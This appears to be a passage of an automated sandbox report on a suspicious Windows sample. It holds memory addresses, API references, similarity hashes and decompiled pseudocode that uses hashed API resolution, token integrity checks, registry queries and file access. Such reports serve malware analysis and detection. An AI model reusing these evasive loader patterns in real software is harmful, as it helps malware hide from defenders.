0x01001295
0x01001298
0x0100129b
0x0100129e
0x010012a1
0x010012bc
0x010012d8
0x010012fd
0x010012ff
0x01001308
0x0100130b
0x01001315
0x01001318
0x0100131b
0x0100131e
0x01001321
0x01001535
0x01001535
0x0100143f
0x01001445
0x0100140d
0x01001413
0x0100146c
0x01001472
0x01001484
0x01001487
0x01001495
0x010014a6
0x010014cf
0x010014d2
0x010014d6
0x010014da
0x010014e1
0x010014e7
0x010014e9
0x010014f2
0x01001503
0x01001509
0x0100150f
0x01001515
0x00000000
0x00000000
0x0100151b
0x0100146c
0x010013b8
0x010013c6
0x010013ce
0x010013d1
0x010013d3
0x010013d9
0x010013e5
0x010013eb
0x010013f1
0x010013f4
0x0100132c
0x0100133c
0x01001342
0x01001348
0x0100134e
0x01001354
0x0100135a
0x01001360
0x01001363
0x01001366
0x0100136e
0x01001376
0x01001379
0x0100137c
0x0100137f
0x01001382
0x0100138d
0x01001429
0x0100142f
0x0100142f
0x01001466
0x010013fa
0x010013b0
0x00000000
0x010013b0

APIs

VirtualProtect.KERNELBASE ref: 01001266
VirtualProtect.KERNELBASE ref: 010012FD
VirtualProtect.KERNELBASE ref: 010014E7

Strings

t, xrefs: 0100136E

Memory Dump Source

Source File: 00000001.00000002.808216210.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: a017da5afd07872a6b9a2eab5bc17a66ba9b926afca1ad1863c42a97b009bf17
Instruction ID: d9ac65c92ec9dcf738c23b5ec27b35aa53f93506a8d45133af0605e4eaaf6240
Opcode Fuzzy Hash: a017da5afd07872a6b9a2eab5bc17a66ba9b926afca1ad1863c42a97b009bf17
Instruction Fuzzy Hash: 92B1ACB4D002188FDB14CF68C980A9DFBF1FF88314F5585AAE988AB351D735A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6EA010A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EA010A4(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6EA0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6E9FC280(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6E9FBB44(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6E9FF584( &_v32, _t26);
						_t68 = E6E9FF4BC( &(_t74[3]), 0);
						if(E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
							L32:
							E6E9FF654( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6EA0306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6EA0306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6E9FF654( &_v48);
						if(_v52 != 0) {
							E6E9FBB44(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6ea010a6
0x6ea010b3
0x6ea010b5
0x6ea010c4
0x6ea010c8
0x6ea010d2
0x6ea010d2
0x6ea010d8
0x6ea010db
0x6ea010dd
0x6ea010e8
0x6ea01122
0x6ea01127
0x6ea0112c
0x6ea0112c
0x00000000
0x6ea010ea
0x6ea010f4
0x6ea01107
0x6ea01118
0x6ea01118
0x6ea0111a
0x6ea01120
0x6ea0113e
0x6ea0114e
0x6ea01165
0x6ea01247
0x6ea0124b
0x00000000
0x6ea0124b
0x6ea0117b
0x6ea0117f
0x00000000
0x00000000
0x6ea01191
0x6ea01198
0x00000000
0x00000000
0x6ea0119e
0x6ea011a0
0x6ea011a1
0x6ea011a2
0x6ea011a6
0x00000000
0x00000000
0x6ea011bd
0x6ea011c1
0x00000000
0x00000000
0x6ea011ce
0x6ea011d2
0x00000000
0x00000000
0x6ea011d4
0x6ea011d8
0x6ea01227
0x6ea011da
0x6ea011df
0x6ea01222
0x6ea011e1
0x6ea011e6
0x6ea0121d
0x6ea011e8
0x6ea011ed
0x6ea01218
0x6ea011ef
0x6ea011f4
0x6ea01213
0x6ea011f6
0x6ea011fb
0x6ea0120e
0x6ea011fd
0x6ea011ff
0x6ea01207
0x6ea01207
0x6ea011fb
0x6ea011f4
0x6ea011ed
0x6ea011e6
0x6ea011df
0x6ea0122c
0x6ea01236
0x6ea0123b
0x6ea0123b
0x00000000
0x6ea01240
0x00000000
0x6ea01120

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EA01118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EA0117B

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 94cd945908534027c4d9918e0a65c14c769b036b2c840ca5e6dc0185d91dc071
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 2F41D570244242ABF755DAE9B860BFF76D89FA930CF248838F590C6194DB34CC89C759

Uniqueness

Uniqueness Score: -1.00%

Function 6EA057B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EA057B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6EA03064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E9FF828(_a8, _t15);
							if(E6EA03064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E9FF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6ea057b8
0x6ea057b9
0x6ea057bb
0x6ea057c0
0x6ea057c7
0x6ea057cb
0x6ea057cb
0x6ea057cb
0x6ea057cf
0x6ea05815
0x6ea05815
0x6ea057d1
0x6ea057d1
0x6ea057d7
0x6ea057e0
0x6ea057e3
0x6ea057fa
0x6ea0580b
0x6ea0580b
0x6ea0580d
0x6ea05813
0x6ea0581e
0x6ea05836
0x6ea05856
0x6ea05856
0x6ea05858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea057d7
0x6ea05860

APIs

RegQueryValueExA.KERNELBASE(?,6EA0D1F8,00000000,?,00000000,00000000,?,?,?,6EA0D1F8,?,6EA05887,?,00000000,00000000), ref: 6EA0580B
RegQueryValueExA.KERNELBASE(?,6EA0D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6EA0D1F8,?,6EA05887,?,00000000), ref: 6EA05856

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
Instruction ID: 27d14d4a9c0f1ecce3377101c940b100c9eec07a9b64165cfc80ed2d3a5d0238
Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
Instruction Fuzzy Hash: D811A230209305EBD660DEA5AC90EABBBDCEF4675CF10882DB49487141EB21EC44DB79

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EA05B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E9FD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E9FD6D0(__ecx, _t60);
					E6E9FCFF8(_t56,  *_t60);
					E6E9FCFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6EA062B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E9FC26C(_t40);
					if(E6E9FC280(_t40) != 0) {
						_t56[2] = E6EA035F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6EA03064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6EA03698(_t59, 0xff, 8);
						if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6ea05b43
0x6ea05b45
0x6ea05b52
0x6ea05b56
0x6ea05b5a
0x6ea05b64
0x6ea05b6b
0x6ea05b6b
0x6ea05b72
0x6ea05b74
0x6ea05b79
0x6ea05b82
0x6ea05b8a
0x6ea05b8a
0x6ea05b7b
0x6ea05b7d
0x6ea05b7d
0x6ea05b79
0x6ea05b8f
0x6ea05b9b
0x6ea05ccc
0x6ea05c09
0x6ea05c12
0x6ea05c13
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x00000000
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cae
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x00000000
0x6ea05c92
0x6ea05ba1
0x6ea05bb1
0x6ea05bb1

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83e0e411c1327bde686e6891e4fde4df859aeda7b50b061b6587baedb921d36
Instruction ID: 59febae222be76b44b6e2b41e8f4b3bc61eaaf390df63927af45d58ff054e14e
Opcode Fuzzy Hash: b83e0e411c1327bde686e6891e4fde4df859aeda7b50b061b6587baedb921d36
Instruction Fuzzy Hash: 59314630244309BFE6A02AF66D88F7B7A9DDFC264CF144C38F941961C5EE11DD98C629

Uniqueness

Uniqueness Score: -1.00%

Function 01001A6A, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 30%

			_entry_(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _v36;
				long _v40;
				int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t31;
				int _t39;
				intOrPtr _t45;
				long _t52;
				long _t54;
				intOrPtr* _t55;

				_t26 = _a4;
				 *_t55 = _t26;
				_v20 = _t26;
				_v24 = L010010B0(__eflags);
				_t28 = E01002084();
				_v28 = _t28;
				if(_t28 != 0) {
					 *_t55 = _v28;
					_t45 =  *((intOrPtr*)(_v20 + 0x48))();
					_t55 = _t55 - 4;
					_v56 = _t45;
				}
				 *_t55 = _v20;
				_t30 = E01002715();
				 *_t55 = _v20;
				_v48 = _t30;
				_t31 = E01001D08(); // executed
				_t52 =  *_v20;
				_t54 =  *((intOrPtr*)(_t52 + 0x3c));
				_t53 = _t54;
				_t46 = _t52;
				_v52 = _t31;
				_v36 = _t52;
				_v32 = _t54;
				_v40 = _t52;
				if(_t54 != 0) {
					_v40 = _v36 + (_v32 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v40 + 0x5c)) != 3) {
					_t39 = FreeConsole(); // executed
					_v44 = _t39;
				}
				 *_t55 = _v20;
				E01002432();
				 *_t55 = _v20; // executed
				E010011ED(_t46, _t53, _t54); // executed
				return 0;
			}

0x01001a73
0x01001a76
0x01001a79
0x01001a81
0x01001a84
0x01001a8c
0x01001a8f
0x01001b21
0x01001b27
0x01001b2a
0x01001b2d
0x01001b2d
0x01001ac7
0x01001aca
0x01001ad2
0x01001ad5
0x01001ad8
0x01001ae0
0x01001ae2
0x01001ae5
0x01001aec
0x01001aee
0x01001af1
0x01001af4
0x01001af7
0x01001afa
0x01001aab
0x01001aab
0x01001ab6
0x01001abd
0x01001abf
0x01001abf
0x01001b01
0x01001b04
0x01001b0c
0x01001b0f
0x01001b1d

APIs

FreeConsole.KERNELBASE ref: 01001ABD

Memory Dump Source

Source File: 00000001.00000002.808216210.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 02806e5c2934e3a1273d5333d188c8a49f68f74e4fbe566bb652225ac1b00e49
Instruction ID: eb6f04b821d1583e3b7334459b55de389e45795289c97338c69f0f5588c73211
Opcode Fuzzy Hash: 02806e5c2934e3a1273d5333d188c8a49f68f74e4fbe566bb652225ac1b00e49
Instruction Fuzzy Hash: F421F8B1E0421A8FEB05EFA8D8945EEBBF0FF48300F154869D585E7380E7359980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EA05BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9FC26C(_t24);
				if(E6E9FC280(_t24) != 0) {
					_t34[2] = E6EA035F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6EA03064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6EA03698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ea05bbd
0x6ea05bc1
0x6ea05bc4
0x6ea05bc7
0x6ea05c09
0x6ea05c12
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x6ea05cc6
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c72
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x6ea05c92
0x6ea05c92
0x6ea05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EA05C3E

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
Instruction ID: 733e7228b30d49d87e17e2c2ae2e4def8e6d8cdba421665dc1b6f581b07dc0d4
Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
Instruction Fuzzy Hash: 4001F93138430ABBFAA026E56D49FBB7B8CDFC265CF158835BA01551C5DE129CD9C129

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EA05BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E9FC26C(_t24);
					if(E6E9FC280(_t24) != 0) {
						_t33[2] = E6EA035F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6EA03064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6EA03698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6ea05be5
0x6ea05be7
0x6ea05bfe
0x6ea05c09
0x6ea05c12
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x6ea05cc6
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c72
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x6ea05c92
0x6ea05c92
0x6ea05be9
0x6ea05be9
0x6ea05bf0
0x6ea05bf0
0x6ea05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EA05C3E

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
Instruction ID: 21bc641eb18170c8f9d85b103ac54a137462af67f344e440bf9552ed1598b29b
Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
Instruction Fuzzy Hash: C0012630284206BBF6E01AE66D48FAB7B4CDF8224CF148C35B901551C4DF22ADE8C228

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EA05BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9FC26C(_t24);
				if(E6E9FC280(_t24) != 0) {
					_t34[2] = E6EA035F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6EA03064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6EA03698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ea05bd1
0x6ea05bd8
0x6ea05bdb
0x6ea05c09
0x6ea05c12
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x6ea05cc6
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c72
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x6ea05c92
0x6ea05c92
0x6ea05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EA05C3E

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
Instruction ID: 3ab4d11b580e21c6000707110aab0bd228819e14f53efbd02ab6b6be8cbbb5c8
Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
Instruction Fuzzy Hash: 27012D3568020ABBF7A026F66D44FBB7B4DDFC225CF148836FA01551C5DE169CD9C129

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EA05BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9FC26C(_t23);
				if(E6E9FC280(_t23) != 0) {
					_t31[2] = E6EA035F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EA03064(0x8e844d1e, 0xba53868);
